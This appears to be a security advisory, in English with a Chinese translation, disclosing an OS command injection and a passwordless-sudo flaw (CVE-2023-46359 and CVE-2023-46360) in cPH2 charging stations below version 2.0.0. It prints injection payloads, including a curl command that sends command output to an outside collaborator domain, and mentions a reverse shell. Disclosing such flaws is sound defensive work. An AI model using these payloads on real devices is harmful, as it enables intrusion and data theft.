OS Command Injection in cPH2 Charging Station <2.0.0 (CVE-2023-46359 and CVE-2023-46360)

During a web application penetration test for one of our clients we identified an OS Command Injection in the cPH2 charging station produced by eCharge Hardy Barth GmbH.
在为我们的一个客户进行的 Web 应用程序渗透测试中，我们在 eCharge Hardy Barth GmbH 生产的 cPH2 充电站中发现了操作系统命令注入。

The cPH2 charging station comes with a web interface where an administrator can monitor and manage real time usage, charge logs, firmware update as well as configuration settings.
cPH2 充电站带有一个 Web 界面，管理员可以在其中监控和管理实时使用情况、充电日志、固件更新以及配置设置。

The vulnerable PHP page is not visible in the user interface, but an inspection of the page source unveiled the existence of the “/connectioncheck.php” endpoint, which takes an IP address as a parameter. Initially designed to assess connectivity to the provided IP, likely through a ping command, this endpoint may be susceptible to OS Command Injection.
易受攻击的PHP页面在用户界面中不可见，但对页面源代码的检查揭示了“/connectioncheck.php”端点的存在，该端点将IP地址作为参数。此终结点最初设计用于评估与所提供 IP 的连接（可能通过 ping 命令），但可能容易受到操作系统命令注入的影响。

Using a straightforward payload such as ip=127.0.0.1 && ${whoami}, the server responds with 127.0.0.1 && ${whoami} => <b>SUCCESS</b>. This indicates that the command injection has been successfully executed. However, it is evident that the server is not displaying the output or result of the executed command.
使用简单的有效负载，例如 ip=127.0.0.1 && ${whoami}，服务器以 127.0.0.1 && ${whoami} => SUCCESS 进行响应。这表示命令注入已成功执行。但是，很明显，服务器没有显示已执行命令的输出或结果。

In order to verify that the paylaod is executed and to extract data, we tried an out-of-band payload 127.0.0.1 && curl $(whoami).puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com and we received DNS and HTTP request to our burp collaborator for the domain www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com.
为了验证 paylaod 是否已执行并提取数据，我们尝试了带外有效负载 127.0.0.1 && curl $（whoami）.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com我们收到了 DNS 和 HTTP 请求，向我们的 burp 合作者发出了域 www-data.puna2r96oxpuhbuhki9vvrinkeq5ex2m.examplecollab.com。

Having confirmed the successful execution of the payload on the target device, we can now deploy a payload to initiate a reverse shell. This specific OS Command Injection vulnerability is formally identified as CVE-2023-46359.
确认在目标设备上成功执行有效负载后，我们现在可以部署有效负载以启动反向 shell。此特定操作系统命令注入漏洞的正式标识为 CVE-2023-46359。

As we can see on the screenshot above, the service is currently running under the user context of www-data, and it has been discovered that this user possesses unnecessary privileges, specifically the ability to execute sudo commands without requiring a password. This configuration could pose a security risk, as an attacker with access to the www-data context may exploit these elevated privileges for unauthorized actions on the system. This vulnerability is referenced by as CVE-2023-46360.
正如我们在上面的屏幕截图中看到的，该服务当前在 www-data 的用户上下文下运行，并且已发现该用户拥有不必要的权限，特别是无需密码即可执行 sudo 命令的能力。此配置可能会带来安全风险，因为有权访问 www-data 上下文的攻击者可能会利用这些提升的权限在系统上执行未经授权的操作。此漏洞被引用为CVE-2023-46360。

Both vulnerabilities affect any cPH2 Charging Station version < 2.0.0.
这两个漏洞都会影响任何 cPH2 充电站 2.0.0 <版本。
The affected customers are advised to update their system to the version 2.0.0 or later
建议受影响的客户将其系统更新至 2.0.0 或更高版本